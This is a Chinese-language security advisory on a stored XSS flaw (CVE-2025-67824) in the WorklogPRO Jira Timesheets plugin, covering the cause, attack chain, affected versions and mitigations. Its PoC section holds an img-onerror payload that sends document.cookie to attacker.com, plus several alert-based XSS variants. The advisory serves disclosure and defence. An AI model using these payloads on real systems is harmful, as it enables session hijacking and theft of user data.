CVE-2025-67824: WorklogPRO Jira Timesheets插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67824

漏洞类型

存储型XSS (Cross-Site Scripting)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WorklogPRO - Jira Timesheets plugin (Jira Data Center)

漏洞概述

CVE-2025-67824是Atlassian Jira Data Center平台上WorklogPRO - Jira Timesheets插件中的一个存储型跨站脚本（XSS）漏洞。该漏洞存在于插件处理过滤器名称的逻辑中，攻击者可以在过滤器名称字段中注入恶意的HTML或JavaScript代码。由于该插件在创建时间表时未对过滤器名称进行充分的输入验证和输出编码，恶意代码会被永久存储在系统中。当其他用户访问并使用相关功能时，存储的恶意脚本会在其浏览器中执行，可能导致会话劫持、敏感信息窃取或对用户进行进一步钓鱼攻击。此漏洞的CVSS评分为6.1，属于中危级别，需要用户交互才能触发。

技术细节

该漏洞的根本原因在于WorklogPRO插件在处理过滤器名称时缺少适当的输入验证和输出编码。具体来说，当用户在自定义时间表对话框中选择过滤器类型并创建时间表时，插件直接使用过滤器名称而未进行安全过滤。攻击者可以构造包含JavaScript代码的恶意过滤器名称，例如：<script>alert(document.cookie)</script>。由于该名称被存储在数据库中且在后续操作中被直接渲染到HTML页面中，任何访问该时间表功能的用户都会触发恶意代码执行。攻击成功的条件包括：1）攻击者需要能够创建或修改过滤器；2）目标用户需要打开包含恶意过滤器的时间表对话框。这种存储型XSS的危害性高于反射型XSS，因为恶意代码会持续存在并影响所有访问该功能的用户。

攻击链分析

STEP 1

步骤1

攻击者登录Jira系统并创建或修改一个过滤器，在过滤器名称字段中注入恶意JavaScript代码

STEP 2

步骤2

恶意代码随过滤器名称被存储到Jira数据库中，形成存储型XSS

STEP 3

步骤3

目标用户访问WorklogPRO时间表功能，打开自定义时间表对话框

STEP 4

步骤4

目标用户选择包含恶意代码的过滤器作为时间表类型

STEP 5

步骤5

插件将未经过滤的过滤器名称渲染到HTML页面中，导致恶意JavaScript在目标用户浏览器中执行

STEP 6

步骤6

攻击者通过恶意脚本窃取用户会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67824 PoC - Stored XSS via Filter Name
// Target: WorklogPRO - Jira Timesheets plugin

// Malicious filter name payload
const maliciousPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">';

// Attack scenario:
// 1. Create a new filter with the malicious name
// 2. Go to Timesheets -> Custom Timesheet Dialog
// 3. Select the filter with malicious name as timesheet type
// 4. The XSS payload will be executed when the dialog renders

// Example filter creation request (authenticated user):
const filterData = {
  name: maliciousPayload,
  jql: 'project IS NOT EMPTY',
  description: 'Benign description'
};

// The filter name is stored without sanitization
// When other users view timesheets using this filter, XSS triggers

// Simplified XSS payload variants:
// 1. <script>alert('XSS')</script>
// 2. <img src=x onerror=alert('XSS')>
// 3. <svg onload=alert('XSS')>
// 4. <body onload=alert('XSS')>

影响范围

WorklogPRO Jira Timesheets plugin < 4.24.2-jira9 (Jira 9版本)

WorklogPRO Jira Timesheets plugin < 4.24.2-jira10 (Jira 10版本)

WorklogPRO Jira Timesheets plugin < 4.24.2-jira11 (Jira 11版本)

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）限制普通用户创建和修改过滤器的权限，仅允许管理员操作；2）在Web应用防火墙（WAF）层面添加XSS防护规则，拦截包含常见XSS模式的请求；3）提醒用户不要点击来源不明的过滤器链接；4）监控Jira系统中新增和修改的过滤器，及时发现可疑内容；5）考虑禁用或限制WorklogPRO插件中自定义时间表功能的使用。